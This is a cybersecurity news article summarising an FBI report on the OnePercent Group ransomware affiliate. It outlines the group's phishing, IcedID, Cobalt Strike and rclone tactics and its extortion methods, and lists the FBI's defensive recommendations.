Friday, October 22, 2021

A look into the tactics of a ransomware affiliate from the FBI

Infosec pros can now study the tactics of a ransomware affiliate gang that has been attacking U.S. organizations since late last year, information which can help them defend against some attacks.

The intel comes from the FBI, which this week issued a report on a gang calling itself the OnePercent Group.

The name apparently comes from its threat to release one per cent of a victim organization’s stolen data if a ransom isn’t paid.

Affiliate groups are gangs that take advantage of the ransomware-as-a-service offerings of big ransomware developers like REvil/Sodinokibi, Darkside, Dharma, LockBit and others. For a monthly fee, affiliates get the bulk of a ransom, with the developer getting about 20 to 30 per cent of the payment.

According to the report, like most ransomware attackers the OnePercent Group sends out phishing email with an infected Microsoft Word or Excel attachment, with the payload executing through a macro. This leads to the download of the IcedID banking trojan. According to the Center for Internet Security, IcedID (also known as BokBot) is a modular banking trojan that targets user financial information and is capable of acting as a dropper for other malware.

This gang uses it to download the Cobalt Strike threat emulation software. A legitimate testing tool, it has become a favourite aid for threat actors. According to Malpedia, Cobalt Strike deploys an in-memory agent named ‘Beacon’ on the victim machine which can be used for command execution, keylogging, file transfer, SOCKS proxying, privilege escalation, mimikatz (for saving authentication credentials), port scanning and lateral movement through and across networks. The FBI report notes this group uses Cobalt Strike in part to move laterally through PowerShell remoting.

For copying and exfiltrating data prior to deploying ransomware this gang uses rclone, a command line program, to manage files on cloud storage.

Related content: What ransomware gangs want

Once the ransomware is successfully deployed, the report says, the victim will receive phone calls with ransom demands through spoofed phone numbers. Victims are also provided a ProtonMail email address for further communication. The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data. When a victim company does not respond, the report says, the actors send subsequent threats to publish the victim company’s stolen data.

The report also includes indicators of compromise that security teams can watch for, including hashes associated with rclone.

The FBI urges organizations to do the following to reduce the odds of being victimized by ransomware. It’s also good advice for fending off any cyber attack:

• back-up critical data offline;
• ensure administrators are not using “Admin Approval” mode;
• implement Microsoft LAPS (Local Administrator Password Solution), if possible;
• ensure copies of critical data are in the cloud or on an external hard drive or storage device. This information should not be accessible from the compromised network;
• secure your back-ups and ensure data is not accessible for modification or deletion from the system where the original data resides;
• keep computers, devices, and applications patched and up-to-date;
• consider adding a coloured email banner that clearly identifies emails received from outside your organization. This helps alert users to malicious email that purport to be from fellow employees;
• disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote
access/RDP logs;
• audit user accounts with administrative privileges and configure access controls to give users the least privilege needed for their work;
• use network segmentation to separate critical data;
• make users adopt multi-factor authentication with strong passphrases.

Would you recommend this article?

Share

Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication. Click this link to send me a note →

Jim Love, Chief Content Officer, IT World Canada
Howard Solomon
Howard Solomon
Currently a freelance writer, I'm the former editor of ITWorldCanada.com and Computing Canada. An IT journalist since 1997, I've written for several of ITWC's sister publications including ITBusiness.ca and Computer Dealer News. Before that I was a staff reporter at the Calgary Herald and the Brampton (Ont.) Daily Times. I can be reached at hsolomon [@] soloreporter.com

Related Tech News